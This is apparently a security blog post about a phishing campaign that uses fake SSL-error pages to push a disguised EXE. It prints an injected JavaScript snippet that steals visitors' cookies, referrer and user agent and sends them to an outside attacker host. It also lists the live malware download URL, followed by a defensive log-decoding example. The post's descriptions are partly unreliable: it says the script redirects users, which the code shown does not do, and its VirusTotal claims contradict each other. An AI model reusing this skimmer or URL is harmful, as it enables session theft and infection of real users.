SSL Error message JavaScript Attack.
HTTPS is the most common way to secure a website.
In the last few months, I was working to check the different SSL error messages that browsers like Chrome and Firefox display when users try to access a website. I am thankful to badssl.com for helping me learn something useful about SSL-based error messages. I have learnt a lot. I was checking different domains that are available to purchase or book. I have been searching for different domains.
Non-popular TLDs are used to book domains.
I have been checking domains with different TLDs that are being purchased. I have found that a couple of domains are used for phishing attacks in the name of HTTP and HTTPS. I visited one such domain that has a website hosted on it and is used for a phishing attack.
While checking websites, I have found that they are completely forged and can hack your computer. They are using this kind of website to carry out phishing attacks. Users are not aware that they are downloading a virus instead of some program that would help them fix the problem.
Generally, the user clicks the link offered to download the software, and if the software is accidentally executed, it harms the computer: the installation can lead to installing malware, such as a harmful Trojan horse virus, or can be used in a ransomware attack.
The website that I came across is named https-center.net. The following are the whois information URL and screenshot:
https://www.whois.com/whois/https-center.net
JavaScript that could be used to plant a virus on your computer.
The hacker gets control of a website and uploads the following JavaScript to it. The script redirects the traffic and makes sure that users see the error message and download the malicious code that would harm their computer.
    // Collect every cookie readable from script, one numbered line per cookie.
    function listCookies() {
        var theCookies = document.cookie.split(';');
        var aString = '';
        for (var i = 1; i <= theCookies.length; i++) {
            aString += i + ' ' + theCookies[i - 1] + "\n";
        }
        return aString;
    }

    // Load a second script from https-center.net, passing the referrer,
    // user agent and cookies as base64-encoded query parameters.
    var jspp22 = document.createElement('script');
    jspp22.src = ('https:' == document.location.protocol ? 'https://' : 'http://') +
        'https-center.net/jquery.js?&up=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0OyBydjo4Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzg2LjA=&ts=MTYxODk0ODk5NC4wNjAz' +
        '&r=' + btoa(document.referrer) +
        '&u=' + btoa(navigator.userAgent) +
        '&c=' + btoa(listCookies());
    document.getElementsByTagName("html")[0].appendChild(jspp22);
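To see what a request made by this script exposes, the following added example (not part of the original post) decodes its base64 query parameters from proxy log lines and lists the cookie names that were sent. The log line format, the sample referrer, user agent and cookie values are constructed, and `decodeBeacon` and `scanLog` are hypothetical helper names.

```javascript
// Added example (not from the original post). Query fields up, ts, r, u, c
// and the host name are taken from the script shown on this page.
const FIELDS = ['up', 'ts', 'r', 'u', 'c'];

function b64(value) {
  // The script does not URL-encode btoa() output, so a '+' in the base64
  // arrives as a space after query parsing; restore it before decoding.
  try { return atob(value.replace(/ /g, '+')); } catch (e) { return null; }
}

// Decode one request URL; returns null if it does not match the script's request.
function decodeBeacon(rawUrl, host) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  if (url.hostname !== host || !url.searchParams.has('c')) return null;
  const out = {};
  for (const key of FIELDS) {
    const v = url.searchParams.get(key);
    out[key] = v === null ? null : b64(v);
  }
  // listCookies() writes "N name=value\n" per cookie; keep the names only,
  // which is enough to decide which sessions need to be invalidated.
  out.cookieNames = (out.c || '').split('\n')
    .map((l) => l.replace(/^\d+\s+/, '').split('=')[0].trim())
    .filter(Boolean);
  return out;
}

// Pull every URL out of proxy log lines and keep the ones that decode.
function scanLog(lines, host) {
  return lines.flatMap((l) => l.match(/https?:\/\/\S+/g) || [])
    .map((u) => decodeBeacon(u, host)).filter(Boolean);
}

// Constructed sample log: up/ts are the values on this page, the referrer,
// user agent and cookies are made up for the example.
const TAIL = '&r=' + btoa('https://shop.example/cart') +
  '&u=' + btoa('Mozilla/5.0 (constructed)') +
  '&c=' + btoa('1 PHPSESSID=abc123\n2  theme=dark\n');
const SAMPLE_LOG = [
  '10.0.0.5 GET https://https-center.net/jquery.js?&up=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0OyBydjo4Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzg2LjA=&ts=MTYxODk0ODk5NC4wNjAz' + TAIL,
  '10.0.0.5 GET https://cdn.example/jquery.js?v=3',
];

console.log(scanLog(SAMPLE_LOG, 'https-center.net'));
```

Cookies marked HttpOnly never appear in `document.cookie`, so they will not show up in the decoded `c` field.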
Here are a few screenshots of how the page looks in Firefox and Chrome.
Once you click on the update recommendation, it will ask you to download an EXE (HTTPS_pfx_update.06_2021.exe). The executable is downloaded from foralison.org. The following is the exact URL from which the virus-laden executable is downloaded:
https://foralison.org/library/HTTPS_pfx_update.06_2021.exe
I have checked the URL with VirusTotal, but it did not flag it as a virus. You can check the following URL for the VirusTotal result:
When I uploaded the file to VirusTotal, it detected the EXE as a virus. Here is another URL:
As you can see in this URL, VirusTotal could not identify this executable as a virus, but believe me, this is a virus that would be harmful. The executable is signed, so it would sometimes bypass virus security, and you might execute it and install malware on your computer.
You can see that the virus is detected by some of the anti-virus scanners, which would help you prevent any harm to your personal and corporate computers.
I would suggest being aware of this kind of fraud attack and ensuring that your anti-virus and updates help you prevent this kind of attack. I am analyzing the EXE right now, and I might come up with another blog post about what I found in the executable and what kind of damage it does to a system.
Professional with 18 years of experience in Cryptography, PKI, Information Security, Data Security, SSL Certificates, TLS Certificates, Cloud Security, Website Security, Email Security, Cloud HSM, IT Infrastructure Management, Cloud Management and Customer Support. Certified in CompTIA Security+, EC-Council CEHv10, MCSE, ITILv3. Domain investor by hobby; owns 150+ domains.